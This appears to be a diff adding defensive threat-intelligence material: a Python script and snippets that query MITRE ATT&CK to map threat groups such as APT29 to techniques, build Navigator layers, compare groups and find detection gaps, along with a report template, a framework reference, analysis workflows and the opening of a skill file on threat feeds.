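
Once the gaps are known, the data source coverage map can suggest which telemetry to enable first. The sketch below ranks data sources by how many gap techniques each one could help detect. It uses small hand-written stand-ins for `data_source_coverage` and `gaps` so it runs on its own; the technique-to-data-source pairings shown are illustrative, not taken from ATT&CK, and the function name is an assumption.

```python
from collections import Counter


def rank_data_sources(data_source_coverage, gaps):
    """Rank data sources by the number of undetected techniques they relate to."""
    gap_set = set(gaps)
    counts = Counter()
    for source, tech_ids in data_source_coverage.items():
        relevant = set(tech_ids) & gap_set
        if relevant:
            counts[source] = len(relevant)
    return counts.most_common()


# Illustrative stand-ins for the structures built in the gap analysis
data_source_coverage = {
    "Process: Process Creation": ["T1059", "T1053", "T1218"],
    "Network Traffic: Network Traffic Flow": ["T1071", "T1041"],
    "File: File Creation": ["T1105"],
}
gaps = {"T1053", "T1218", "T1041"}

ranking = rank_data_sources(data_source_coverage, gaps)
for source, count in ranking:
    print(f"{source}: covers {count} gap technique(s)")
```

The count is a rough proxy for return on effort; collection cost and log volume still need to be weighed per data source.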
|
||||
|
||||
### Step 5: Cross-Group Technique Comparison
|
||||
|
||||
```python
from attackcti import attack_client

lift = attack_client()
all_group_objects = lift.get_groups()


def find_group(group_id):
    """Return the group STIX object whose ATT&CK external ID matches group_id."""
    for g in all_group_objects:
        if any(ref.get("external_id") == group_id for ref in g.get("external_references", [])):
            return g
    return None


# Compare techniques across multiple groups
groups_to_compare = {
    "G0016": "APT29",
    "G0007": "APT28",
    "G0032": "Lazarus Group",
}

group_techniques = {}
for gid, gname in groups_to_compare.items():
    # get_techniques_used_by_group() takes the group's STIX object, not the ID string
    techs = lift.get_techniques_used_by_group(find_group(gid))
    tech_ids = set()
    for t in techs:
        tid = t.get("external_references", [{}])[0].get("external_id", "")
        if tid:
            tech_ids.add(tid)
    group_techniques[gname] = tech_ids

# Find common and unique techniques
all_groups = list(group_techniques.keys())
common_to_all = set.intersection(*group_techniques.values())
print(f"\nTechniques common to all {len(all_groups)} groups: {len(common_to_all)}")
for tid in sorted(common_to_all):
    print(f"  {tid}")

for gname, techs in group_techniques.items():
    others = [t for n, t in group_techniques.items() if n != gname]
    unique = techs - set().union(*others)
    print(f"\nUnique to {gname}: {len(unique)} techniques")
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- ATT&CK data successfully queried via TAXII server or local copy
|
||||
- Threat actor mapped to specific techniques with procedure examples
|
||||
- ATT&CK Navigator layer JSON is valid and renders correctly
|
||||
- Detection gap analysis identifies unmonitored techniques
|
||||
- Cross-group comparison reveals shared and unique TTPs
|
||||
- Output is actionable for detection engineering prioritization
|
||||
|
||||
## References
|
||||
|
||||
- [MITRE ATT&CK](https://attack.mitre.org/)
|
||||
- [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
|
||||
- [attackcti Python Library](https://github.com/OTRF/ATTACK-Python-Client)
|
||||
- [ATT&CK STIX Data](https://github.com/mitre/cti)
|
||||
- [ATT&CK Groups](https://attack.mitre.org/groups/)
|
||||
@@ -0,0 +1,87 @@
|
||||
# Threat Actor TTP Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|-------|-------|
| Report ID | TTP-YYYY-NNNN |
| Date | YYYY-MM-DD |
| Threat Actor | [Group Name] |
| ATT&CK ID | G[NNNN] |
| Classification | TLP:AMBER |
| Analyst | [Name] |
|
||||
|
||||
## Threat Actor Profile
|
||||
|
||||
| Attribute | Detail |
|-----------|--------|
| Name | |
| Aliases | |
| Suspected Origin | |
| Motivation | Espionage / Financial / Disruption |
| Active Since | |
| Targeted Sectors | |
| Targeted Regions | |
| Associated Malware | |
|
||||
|
||||
## TTP Summary
|
||||
|
||||
| Tactic | Technique Count | Key Techniques |
|--------|----------------|----------------|
| Reconnaissance | | |
| Resource Development | | |
| Initial Access | | |
| Execution | | |
| Persistence | | |
| Privilege Escalation | | |
| Defense Evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral Movement | | |
| Collection | | |
| Command and Control | | |
| Exfiltration | | |
| Impact | | |
|
||||
|
||||
## Detailed Technique Mapping
|
||||
|
||||
### [Tactic Name]
|
||||
|
||||
| ATT&CK ID | Technique | Sub-technique | Procedure Example |
|-----------|-----------|---------------|-------------------|
| T1566.001 | Phishing | Spearphishing Attachment | Actor sends macro-enabled documents |
| | | | |
|
||||
|
||||
## Detection Coverage
|
||||
|
||||
| Status | Count | Percentage |
|--------|-------|-----------|
| Detected | | % |
| Partial Detection | | % |
| No Detection (Gap) | | % |
|
||||
|
||||
## Detection Gaps (Priority Order)
|
||||
|
||||
| Priority | ATT&CK ID | Technique | Required Data Source | Effort |
|----------|-----------|-----------|---------------------|--------|
| 1 | | | | Low/Med/High |
| 2 | | | | |
|
||||
|
||||
## Recommended Data Sources
|
||||
|
||||
| Data Source | Techniques Covered | Current Status |
|------------|-------------------|----------------|
| Process Creation | X techniques | Collecting/Not Collecting |
| Network Traffic Flow | X techniques | |
| File Monitoring | X techniques | |
|
||||
|
||||
## ATT&CK Navigator Layer
|
||||
|
||||
Layer file: `[group]_navigator_layer.json`
|
||||
|
||||
Load at: https://mitre-attack.github.io/attack-navigator/
|
||||
|
||||
## Recommendations
|
||||
|
||||
1. **Immediate**: Deploy detections for [top 3 gap techniques]
|
||||
2. **Short-term**: Enable [data source] collection to cover N techniques
|
||||
3. **Long-term**: Build behavioral analytics for [tactic] coverage
|
||||
@@ -0,0 +1,89 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## MITRE ATT&CK Framework
|
||||
|
||||
### Matrix Structure
|
||||
- **Enterprise ATT&CK**: Windows, macOS, Linux, Cloud (AWS, Azure, GCP, SaaS, Office 365), Network, Containers
|
||||
- **Mobile ATT&CK**: Android, iOS
|
||||
- **ICS ATT&CK**: Industrial Control Systems
|
||||
|
||||
### 14 Enterprise Tactics (Kill Chain Order)
|
||||
1. **Reconnaissance** (TA0043): Gathering information for planning
|
||||
2. **Resource Development** (TA0042): Establishing resources for operations
|
||||
3. **Initial Access** (TA0001): Gaining initial foothold
|
||||
4. **Execution** (TA0002): Running adversary-controlled code
|
||||
5. **Persistence** (TA0003): Maintaining access across restarts
|
||||
6. **Privilege Escalation** (TA0004): Gaining higher-level permissions
|
||||
7. **Defense Evasion** (TA0005): Avoiding detection
|
||||
8. **Credential Access** (TA0006): Stealing credentials
|
||||
9. **Discovery** (TA0007): Understanding the environment
|
||||
10. **Lateral Movement** (TA0008): Moving through the environment
|
||||
11. **Collection** (TA0009): Gathering data of interest
|
||||
12. **Command and Control** (TA0011): Communicating with compromised systems
|
||||
13. **Exfiltration** (TA0010): Stealing data
|
||||
14. **Impact** (TA0040): Manipulating, interrupting, or destroying systems
|
||||
|
||||
### Technique Naming Convention
|
||||
- **Technique**: T[NNNN] (e.g., T1059 - Command and Scripting Interpreter)
|
||||
- **Sub-technique**: T[NNNN].[NNN] (e.g., T1059.001 - PowerShell)
|
||||
- **Group**: G[NNNN] (e.g., G0016 - APT29)
|
||||
- **Software**: S[NNNN] (e.g., S0154 - Cobalt Strike)
|
||||
- **Mitigation**: M[NNNN] (e.g., M1049 - Antivirus/Antimalware)
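
The naming convention above is regular enough to validate identifiers before they reach a report or Navigator layer. The following sketch classifies an ID by pattern and resolves a sub-technique to its parent. The helper names are illustrative, and the `TA[NNNN]` tactic pattern is taken from the tactic list earlier in this reference.

```python
import re

# Patterns follow the naming convention listed above; tactics use TA[NNNN]
ID_PATTERNS = {
    "sub-technique": re.compile(r"^T\d{4}\.\d{3}$"),
    "technique": re.compile(r"^T\d{4}$"),
    "tactic": re.compile(r"^TA\d{4}$"),
    "group": re.compile(r"^G\d{4}$"),
    "software": re.compile(r"^S\d{4}$"),
    "mitigation": re.compile(r"^M\d{4}$"),
}


def classify_attack_id(value):
    """Return the object kind for an ATT&CK ID, or None if it matches no pattern."""
    for kind, pattern in ID_PATTERNS.items():
        if pattern.match(value):
            return kind
    return None


def parent_technique(value):
    """Map a sub-technique ID such as T1059.001 to its parent technique ID."""
    if classify_attack_id(value) == "sub-technique":
        return value.split(".")[0]
    return value


for sample_id in ["T1059", "T1059.001", "TA0043", "G0016", "S0154", "M1049", "X123"]:
    print(sample_id, classify_attack_id(sample_id), parent_technique(sample_id))
```

Rolling sub-techniques up to their parent is useful when a detection inventory is tracked at technique level but threat reports cite sub-techniques.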
|
||||
|
||||
### Data Sources
|
||||
ATT&CK v16+ uses structured data sources:
|
||||
- Process: Process Creation, Process Access, OS API Execution
|
||||
- File: File Creation, File Modification, File Access
|
||||
- Network Traffic: Network Connection Creation, Network Traffic Flow
|
||||
- Command: Command Execution
|
||||
- Module: Module Load
|
||||
- Windows Registry: Windows Registry Key Modification
|
||||
|
||||
## STIX 2.1 Representation
|
||||
|
||||
### Attack Pattern (SDO)
|
||||
Maps to ATT&CK techniques:
|
||||
```json
{
  "type": "attack-pattern",
  "id": "attack-pattern--uuid",
  "name": "Spearphishing Attachment",
  "external_references": [
    {"source_name": "mitre-attack", "external_id": "T1566.001"}
  ],
  "kill_chain_phases": [
    {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}
  ]
}
```
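
When reading attack-pattern objects like the one above, it is safer to select the external reference by `source_name` than to assume the ATT&CK entry is first in the list. The sketch below shows that lookup on a plain dictionary; the helper names are illustrative, and the extra `capec` reference in the sample is made up to demonstrate the filtering.

```python
def attack_id(stix_obj):
    """Return the ATT&CK ID from the 'mitre-attack' external reference, or ''."""
    for ref in stix_obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id", "")
    return ""


def attack_tactics(stix_obj):
    """Return the ATT&CK tactic phase names attached to a technique."""
    return [
        phase.get("phase_name", "")
        for phase in stix_obj.get("kill_chain_phases", [])
        if phase.get("kill_chain_name") == "mitre-attack"
    ]


# Sample object; the capec entry is a made-up extra reference placed first on purpose
pattern = {
    "type": "attack-pattern",
    "name": "Spearphishing Attachment",
    "external_references": [
        {"source_name": "capec", "external_id": "CAPEC-163"},
        {"source_name": "mitre-attack", "external_id": "T1566.001"},
    ],
    "kill_chain_phases": [
        {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"},
    ],
}

print(attack_id(pattern), attack_tactics(pattern))
```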
|
||||
|
||||
### Intrusion Set (SDO)
|
||||
Maps to ATT&CK groups:
|
||||
```json
{
  "type": "intrusion-set",
  "name": "APT29",
  "aliases": ["Cozy Bear", "The Dukes", "NOBELIUM"],
  "goals": ["espionage"],
  "resource_level": "government"
}
```
|
||||
|
||||
## ATT&CK Navigator Layer Specification
|
||||
|
||||
### Layer Version 4.5 Schema
|
||||
- `name`: Layer display name
- `domain`: enterprise-attack, mobile-attack, ics-attack
- `techniques[]`: Array of technique annotations
  - `techniqueID`: ATT&CK ID
  - `score`: Numeric score (0-100)
  - `color`: Hex color override
  - `comment`: Analyst notes
  - `enabled`: Show/hide technique
  - `metadata[]`: Key-value pairs for additional context
|
||||
|
||||
## References
|
||||
- [MITRE ATT&CK Enterprise](https://attack.mitre.org/matrices/enterprise/)
|
||||
- [ATT&CK STIX Data Repository](https://github.com/mitre/cti)
|
||||
- [Navigator Layer Format](https://github.com/mitre-attack/attack-navigator/blob/master/layers/LAYERFORMATv4_5.md)
|
||||
- [ATT&CK Design and Philosophy](https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf)
|
||||
@@ -0,0 +1,90 @@
|
||||
# MITRE ATT&CK Analysis Workflows
|
||||
|
||||
## Workflow 1: Threat Actor TTP Mapping
|
||||
|
||||
```
[Threat Report] --> [Extract Behaviors] --> [Map to ATT&CK] --> [Navigator Layer]
                                                                        |
                                                                        v
                                                             [Detection Priorities]
```
|
||||
|
||||
### Steps:
|
||||
1. **Report Ingestion**: Obtain threat intelligence report (vendor, OSINT, internal)
|
||||
2. **Behavior Extraction**: Identify adversary actions described in the report
|
||||
3. **Technique Mapping**: Map each behavior to ATT&CK technique IDs using the ATT&CK knowledge base
|
||||
4. **Sub-technique Precision**: Drill down to sub-techniques where procedure details allow
|
||||
5. **Layer Creation**: Generate ATT&CK Navigator layer with mapped techniques
|
||||
6. **Priority Assessment**: Rank techniques by detection feasibility and impact
|
||||
|
||||
## Workflow 2: Detection Gap Analysis
|
||||
|
||||
```
[Current Detections] --> [Detection Layer] --> [Overlay with Threat Layer] --> [Gap Layer]
                                                                                    |
                                                                                    v
                                                                          [Engineering Backlog]
```
|
||||
|
||||
### Steps:
|
||||
1. **Detection Inventory**: Catalog existing detection rules mapped to ATT&CK techniques
|
||||
2. **Detection Layer**: Create Navigator layer showing detected techniques (green)
|
||||
3. **Threat Layer**: Create layer showing adversary techniques (red)
|
||||
4. **Overlay Analysis**: Combine layers to identify uncovered threat techniques
|
||||
5. **Gap Prioritization**: Rank gaps by threat actor relevance and detection feasibility
|
||||
6. **Engineering Plan**: Create detection engineering backlog from prioritized gaps
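
The overlay step in this workflow can also be done offline by combining two layer dictionaries. The sketch below keeps every technique from the threat layer that has no positively scored entry in the detection layer. It builds a trimmed-down layer containing only `name`, `domain`, and `techniques`, so treat it as a starting point: the function name and sample layers are assumptions, and fields such as `versions` may need to be added before loading the result into the Navigator.

```python
import json


def build_gap_layer(threat_layer, detection_layer, name="Detection gaps"):
    """Return a layer with threat techniques that lack a scored detection entry."""
    detected = {
        t["techniqueID"]
        for t in detection_layer.get("techniques", [])
        if t.get("score", 0) > 0
    }
    gap_techniques = [
        {
            "techniqueID": t["techniqueID"],
            "score": 100,
            "color": "#ff6666",
            "comment": "No detection coverage",
            "enabled": True,
        }
        for t in threat_layer.get("techniques", [])
        if t["techniqueID"] not in detected
    ]
    return {
        "name": name,
        "domain": threat_layer.get("domain", "enterprise-attack"),
        "techniques": gap_techniques,
    }


# Hypothetical input layers
threat_layer = {
    "domain": "enterprise-attack",
    "techniques": [{"techniqueID": "T1059"}, {"techniqueID": "T1071"}, {"techniqueID": "T1027"}],
}
detection_layer = {
    "domain": "enterprise-attack",
    "techniques": [{"techniqueID": "T1059", "score": 100}, {"techniqueID": "T1027", "score": 0}],
}

gap_layer = build_gap_layer(threat_layer, detection_layer)
print(json.dumps(gap_layer, indent=2))
```

Treating a score of 0 as "not detected" lets the detection layer list planned rules without counting them as coverage.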
|
||||
|
||||
## Workflow 3: Cross-Actor Comparison
|
||||
|
||||
```
[Group A TTPs] --+
                 |--> [Intersection Analysis] --> [Common Techniques] --> [Priority Detections]
[Group B TTPs] --+               |
                 |               v
[Group C TTPs] --+ [Unique Techniques per Group]
```
|
||||
|
||||
### Steps:
|
||||
1. **Group Selection**: Choose threat groups relevant to your industry/region
|
||||
2. **TTP Extraction**: Pull technique lists for each group from ATT&CK
|
||||
3. **Common Analysis**: Find techniques shared across all selected groups
|
||||
4. **Unique Analysis**: Identify techniques unique to specific groups
|
||||
5. **Detection ROI**: Prioritize detections for commonly used techniques (highest coverage ROI)
|
||||
6. **Actor Attribution**: Use unique techniques as potential attribution indicators
|
||||
|
||||
## Workflow 4: Campaign-to-TTP Analysis
|
||||
|
||||
```
[Campaign IOCs] --> [Sandbox/Analysis] --> [Behavior Extraction] --> [TTP Mapping]
                                                                           |
                                                                           v
                                                               [Compare to Known Groups]
                                                                           |
                                                                           v
                                                               [Attribution Hypothesis]
```
|
||||
|
||||
### Steps:
|
||||
1. **IOC Collection**: Gather campaign IOCs (malware hashes, C2 domains, phishing emails)
|
||||
2. **Dynamic Analysis**: Execute samples in sandbox, capture behavioral artifacts
|
||||
3. **Behavior Documentation**: Document file operations, registry changes, network connections, process activity
|
||||
4. **ATT&CK Mapping**: Map observed behaviors to techniques and sub-techniques
|
||||
5. **Group Comparison**: Compare campaign TTPs against known group profiles
|
||||
6. **Attribution Assessment**: Assess likelihood of attribution based on TTP overlap
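
Steps 5 and 6 can be approximated with a set-similarity score. This sketch uses Jaccard similarity as one possible overlap measure (an assumption, since the workflow does not name a metric); the group names and technique sets are made up for illustration.

```python
def jaccard(a, b):
    """Jaccard similarity of two technique-ID collections (0.0 to 1.0)."""
    a, b = set(a), set(b)
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def rank_candidate_groups(campaign_ttps, group_profiles):
    """Return (group, score) pairs sorted from highest to lowest overlap."""
    scores = [
        (name, round(jaccard(campaign_ttps, ttps), 3))
        for name, ttps in group_profiles.items()
    ]
    return sorted(scores, key=lambda item: item[1], reverse=True)


# Hypothetical group profiles and campaign observations.
profiles = {
    "Group A": {"T1566", "T1059", "T1003"},
    "Group B": {"T1190", "T1505"},
}
ranking = rank_candidate_groups({"T1566", "T1059"}, profiles)
print(ranking)
```

TTP overlap alone is weak evidence, because many groups share common techniques; a score like this is better treated as input to an attribution hypothesis than as a conclusion.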
|
||||
|
||||
## Workflow 5: Threat-Informed Defense
|
||||
|
||||
```
[ATT&CK Mappings] --> [Data Source Analysis] --> [Telemetry Assessment] --> [Control Mapping]
                                                                                    |
                                                                                    v
                                                                           [Security Roadmap]
```
|
||||
|
||||
### Steps:
|
||||
1. **Threat Profile**: Identify relevant threat actors and their techniques
|
||||
2. **Data Source Mapping**: Determine which data sources can detect each technique
|
||||
3. **Telemetry Audit**: Assess which data sources are currently collected
|
||||
4. **Control Assessment**: Map existing security controls to technique mitigations
|
||||
5. **Gap Identification**: Find techniques with neither detection nor mitigation coverage
|
||||
6. **Roadmap Creation**: Build security improvement roadmap addressing highest-risk gaps
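
Step 5 (gap identification) can be sketched as a filter over the outputs of steps 2 to 4. The example assumes a mapping from technique ID to the data sources that can detect it; the function name `find_uncovered` and the data source names are illustrative only.

```python
def find_uncovered(techniques, collected_sources, mitigated_ids):
    """Return technique IDs with neither detection telemetry nor a mitigation.

    techniques: dict of technique ID -> list of data sources able to detect it
    collected_sources: data sources the organization currently collects
    mitigated_ids: technique IDs covered by an existing security control
    """
    collected = set(collected_sources)
    uncovered = []
    for tech_id, sources in sorted(techniques.items()):
        detectable = bool(collected.intersection(sources))
        mitigated = tech_id in mitigated_ids
        if not detectable and not mitigated:
            uncovered.append(tech_id)
    return uncovered


# Hypothetical technique-to-data-source mapping.
techniques = {
    "T1003": ["Process Access", "Command Execution"],
    "T1566": ["Network Traffic Content"],
    "T1190": ["Application Log Content"],
}
uncovered = find_uncovered(techniques, ["Command Execution"], {"T1566"})
print(uncovered)
```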
|
||||
@@ -0,0 +1,353 @@
|
||||
#!/usr/bin/env python3
"""
MITRE ATT&CK Threat Actor TTP Analysis Script

Queries the MITRE ATT&CK STIX data to:
- Map threat actor groups to their known techniques
- Generate ATT&CK Navigator layers for visualization
- Perform detection gap analysis
- Compare TTPs across multiple threat groups
- Identify high-priority detection opportunities

Requirements:
    pip install attackcti mitreattack-python stix2 requests

Usage:
    python process.py --group APT29 --output apt29_layer.json
    python process.py --compare APT28 APT29 "Lazarus Group"
    python process.py --gap-analysis --detections detections.json --group APT29
"""

import argparse
import json
import sys
from collections import defaultdict
from typing import Optional

try:
    from attackcti import attack_client
except ImportError:
    print("ERROR: attackcti not installed. Run: pip install attackcti")
    sys.exit(1)
|
||||
|
||||
|
||||
class ATTACKAnalyzer:
    """Analyze threat actor TTPs using MITRE ATT&CK."""

    def __init__(self):
        print("[*] Initializing ATT&CK client (querying MITRE TAXII server)...")
        self.lift = attack_client()
        self.groups_cache = None
        self.techniques_cache = None

    def _get_groups(self):
        # Fetch the group list once and reuse it for later lookups
        if self.groups_cache is None:
            self.groups_cache = self.lift.get_groups()
        return self.groups_cache

    def _get_techniques(self):
        # Fetch the enterprise technique list once and reuse it
        if self.techniques_cache is None:
            self.techniques_cache = self.lift.get_enterprise_techniques()
        return self.techniques_cache

    def find_group(self, name: str) -> Optional[dict]:
        """Find a threat group by name or alias."""
        groups = self._get_groups()
        for group in groups:
            if name.lower() == group.get("name", "").lower():
                return group
            aliases = group.get("aliases", [])
            if any(name.lower() == a.lower() for a in aliases):
                return group
        return None
|
||||
|
||||
    def get_group_techniques(self, group_name: str) -> dict:
        """Get all techniques used by a threat group."""
        group = self.find_group(group_name)
        if not group:
            print(f"[-] Group '{group_name}' not found")
            return {}

        # Resolve the ATT&CK group ID (e.g. G0016) for reporting
        group_id = ""
        for ref in group.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                group_id = ref.get("external_id", "")
                break

        if not group_id:
            print(f"[-] No ATT&CK ID found for {group_name}")
            return {}

        # attackcti documents this call as taking the group STIX object,
        # not the external ID string, so pass the object found above.
        techniques = self.lift.get_techniques_used_by_group(group)
        technique_map = {}

        for tech in techniques:
            tech_id = ""
            for ref in tech.get("external_references", []):
                if ref.get("source_name") == "mitre-attack":
                    tech_id = ref.get("external_id", "")
                    break

            if not tech_id:
                continue

            tactics = [
                phase.get("phase_name", "")
                for phase in tech.get("kill_chain_phases", [])
            ]

            technique_map[tech_id] = {
                "name": tech.get("name", ""),
                "tactics": tactics,
                "description": tech.get("description", "")[:500],
                "platforms": tech.get("x_mitre_platforms", []),
                "data_sources": tech.get("x_mitre_data_sources", []),
            }

        print(f"[+] {group_name} ({group_id}): {len(technique_map)} techniques")
        return technique_map
|
||||
|
||||
    def create_navigator_layer(self, group_name: str, technique_map: dict,
                               color: str = "#ff6666") -> dict:
        """Generate ATT&CK Navigator layer JSON."""
        techniques_list = []
        for tech_id, info in technique_map.items():
            # One entry per (technique, tactic) pair so each tactic column is colored
            for tactic in info["tactics"]:
                techniques_list.append({
                    "techniqueID": tech_id,
                    "tactic": tactic,
                    "color": color,
                    "comment": info["name"],
                    "enabled": True,
                    "score": 100,
                    "metadata": [
                        {"name": "group", "value": group_name},
                        {"name": "platforms", "value": ", ".join(info["platforms"])},
                    ],
                })

        layer = {
            "name": f"{group_name} TTP Coverage",
            "versions": {
                "attack": "16.1",
                "navigator": "5.1.0",
                "layer": "4.5",
            },
            "domain": "enterprise-attack",
            "description": f"Techniques attributed to {group_name}",
            "filters": {
                "platforms": [
                    "Linux", "macOS", "Windows", "Cloud",
                    "Azure AD", "Office 365", "SaaS", "Google Workspace",
                ]
            },
            "sorting": 0,
            "layout": {
                "layout": "side",
                "aggregateFunction": "average",
                "showID": True,
                "showName": True,
                "showAggregateScores": False,
                "countUnscored": False,
            },
            "hideDisabled": False,
            "techniques": techniques_list,
            "gradient": {
                "colors": ["#ffffff", color],
                "minValue": 0,
                "maxValue": 100,
            },
            "legendItems": [
                {"label": f"Used by {group_name}", "color": color},
                {"label": "Not observed", "color": "#ffffff"},
            ],
            "showTacticRowBackground": True,
            "tacticRowBackground": "#dddddd",
            "selectTechniquesAcrossTactics": True,
            "selectSubtechniquesWithParent": False,
            "selectVisibleTechniques": False,
        }

        return layer
|
||||
|
||||
    def compare_groups(self, group_names: list) -> dict:
        """Compare TTPs across multiple threat groups."""
        group_techs = {}
        for name in group_names:
            techs = self.get_group_techniques(name)
            # Skip groups that could not be resolved; an empty set would
            # otherwise wipe out the intersection below.
            if techs:
                group_techs[name] = set(techs.keys())

        if len(group_techs) < 2:
            print("[-] Need at least 2 groups for comparison")
            return {}

        all_techniques = set.union(*group_techs.values())
        common_to_all = set.intersection(*group_techs.values())

        comparison = {
            "groups": list(group_techs),
            "total_unique_techniques": len(all_techniques),
            "common_to_all": sorted(common_to_all),
            "common_count": len(common_to_all),
            "per_group": {},
        }

        for name, techs in group_techs.items():
            # Techniques used by every other group in the comparison
            others = set.union(*[t for n, t in group_techs.items() if n != name])
            unique = techs - others

            comparison["per_group"][name] = {
                "total": len(techs),
                "unique": sorted(unique),
                "unique_count": len(unique),
                "overlap_percentage": round(
                    len(techs.intersection(others)) / len(techs) * 100, 1
                ) if techs else 0,
            }

        # Technique frequency across groups
        tech_freq = defaultdict(list)
        for name, techs in group_techs.items():
            for t in techs:
                tech_freq[t].append(name)

        comparison["technique_frequency"] = {
            t: {"count": len(g), "groups": g}
            for t, g in sorted(tech_freq.items(), key=lambda x: -len(x[1]))
        }

        return comparison
|
||||
|
||||
    def gap_analysis(self, group_name: str,
                     detected_techniques: set) -> dict:
        """Analyze detection gaps for a specific threat group."""
        actor_techs = self.get_group_techniques(group_name)
        actor_tech_ids = set(actor_techs.keys())

        covered = actor_tech_ids.intersection(detected_techniques)
        gaps = actor_tech_ids - detected_techniques

        gap_details = []
        for tech_id in sorted(gaps):
            info = actor_techs.get(tech_id, {})
            gap_details.append({
                "technique_id": tech_id,
                "name": info.get("name", ""),
                "tactics": info.get("tactics", []),
                "data_sources": info.get("data_sources", []),
                "platforms": info.get("platforms", []),
            })

        analysis = {
            "group": group_name,
            "total_actor_techniques": len(actor_tech_ids),
            "detected": len(covered),
            "gaps": len(gaps),
            "coverage_percentage": round(
                len(covered) / len(actor_tech_ids) * 100, 1
            ) if actor_tech_ids else 0,
            "detected_techniques": sorted(covered),
            "gap_details": gap_details,
            "recommended_data_sources": self._recommend_data_sources(gap_details),
        }

        return analysis

    def _recommend_data_sources(self, gaps: list) -> list:
        """Recommend data sources that would close the most gaps."""
        ds_coverage = defaultdict(list)
        for gap in gaps:
            for ds in gap.get("data_sources", []):
                ds_coverage[ds].append(gap["technique_id"])

        # Rank data sources by how many gap techniques each one can observe
        recommendations = [
            {"data_source": ds, "covers_techniques": techs, "count": len(techs)}
            for ds, techs in sorted(ds_coverage.items(), key=lambda x: -len(x[1]))
        ]

        return recommendations[:10]
|
||||
|
||||
    def tactic_breakdown(self, group_name: str) -> dict:
        """Break down threat actor techniques by tactic."""
        techs = self.get_group_techniques(group_name)
        tactic_map = defaultdict(list)

        for tech_id, info in techs.items():
            for tactic in info["tactics"]:
                tactic_map[tactic].append({
                    "id": tech_id,
                    "name": info["name"],
                })

        # Enterprise tactics in kill-chain order
        tactic_order = [
            "reconnaissance", "resource-development", "initial-access",
            "execution", "persistence", "privilege-escalation",
            "defense-evasion", "credential-access", "discovery",
            "lateral-movement", "collection", "command-and-control",
            "exfiltration", "impact",
        ]

        breakdown = {}
        for tactic in tactic_order:
            if tactic in tactic_map:
                breakdown[tactic] = {
                    "count": len(tactic_map[tactic]),
                    "techniques": tactic_map[tactic],
                }

        return breakdown
|
||||
|
||||
|
||||
def main():
    parser = argparse.ArgumentParser(
        description="MITRE ATT&CK Threat Actor TTP Analyzer"
    )
    parser.add_argument("--group", help="Threat group name (e.g., APT29)")
    parser.add_argument("--compare", nargs="+", help="Compare multiple groups")
    parser.add_argument(
        "--gap-analysis", action="store_true", help="Perform detection gap analysis"
    )
    parser.add_argument(
        "--detections",
        help="JSON file with detected technique IDs",
    )
    parser.add_argument("--breakdown", action="store_true", help="Tactic breakdown")
    parser.add_argument("--output", default="attack_layer.json", help="Output file")

    args = parser.parse_args()
    analyzer = ATTACKAnalyzer()

    if args.compare:
        comparison = analyzer.compare_groups(args.compare)
        print(json.dumps(comparison, indent=2))
        with open(args.output, "w") as f:
            json.dump(comparison, f, indent=2)

    elif args.group and args.gap_analysis:
        # The detections file is expected to hold a JSON list of technique IDs
        detected = set()
        if args.detections:
            with open(args.detections) as f:
                detected = set(json.load(f))

        analysis = analyzer.gap_analysis(args.group, detected)
        print(json.dumps(analysis, indent=2))
        with open(args.output, "w") as f:
            json.dump(analysis, f, indent=2)

    elif args.group and args.breakdown:
        breakdown = analyzer.tactic_breakdown(args.group)
        print(json.dumps(breakdown, indent=2))

    elif args.group:
        tech_map = analyzer.get_group_techniques(args.group)
        layer = analyzer.create_navigator_layer(args.group, tech_map)
        with open(args.output, "w") as f:
            json.dump(layer, f, indent=2)
        print(f"[+] Navigator layer saved to {args.output}")

    else:
        parser.print_help()


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,104 @@
|
||||
---
|
||||
name: analyzing-threat-intelligence-feeds
|
||||
description: >
|
||||
Analyzes structured and unstructured threat intelligence feeds to extract actionable indicators,
|
||||
adversary tactics, and campaign context. Use when ingesting commercial or open-source CTI feeds,
|
||||
evaluating feed quality, normalizing data into STIX 2.1 format, or enriching existing IOCs with
|
||||
campaign attribution. Activates for requests involving ThreatConnect, Recorded Future, Mandiant
|
||||
Advantage, MISP, AlienVault OTX, or automated feed aggregation pipelines.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [STIX, TAXII, MITRE-ATT&CK, IOC, ThreatConnect, Recorded-Future, MISP, CTI, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Threat Intelligence Feeds
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Ingesting new commercial or OSINT threat feeds and assessing their signal-to-noise ratio
|
||||
- Normalizing heterogeneous IOC formats (STIX 2.1, OpenIOC, YARA, Sigma) into a unified schema
|
||||
- Evaluating feed freshness, fidelity, and relevance to the organization's threat profile
|
||||
- Building automated enrichment pipelines that correlate IOCs against SIEM events
|
||||
|
||||
**Do not use** this skill for raw packet capture analysis or live incident triage without first establishing a CTI baseline.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Access to a Threat Intelligence Platform (TIP) such as ThreatConnect, MISP, or OpenCTI
|
||||
- API keys for at least one commercial feed (Recorded Future, Mandiant Advantage, or VirusTotal Enterprise)
|
||||
- TAXII 2.1 client library (taxii2-client Python package or equivalent)
|
||||
- Role with read/write permissions to the TIP's indicator database
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Enumerate and Prioritize Feed Sources
|
||||
|
||||
List all available feeds categorized by type (commercial, government, ISAC, OSINT):
|
||||
- Commercial: Recorded Future, Mandiant Advantage, CrowdStrike Falcon Intelligence
|
||||
- Government: CISA AIS (Automated Indicator Sharing), FBI InfraGard, MS-ISAC
|
||||
- OSINT: AlienVault OTX, Abuse.ch, PhishTank, Emerging Threats
|
||||
|
||||
Score each feed on: update frequency, historical accuracy rate, coverage of your sector, and attribution depth. Use a weighted scoring matrix with criteria from NIST SP 800-150 (Guide to Cyber Threat Information Sharing).
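
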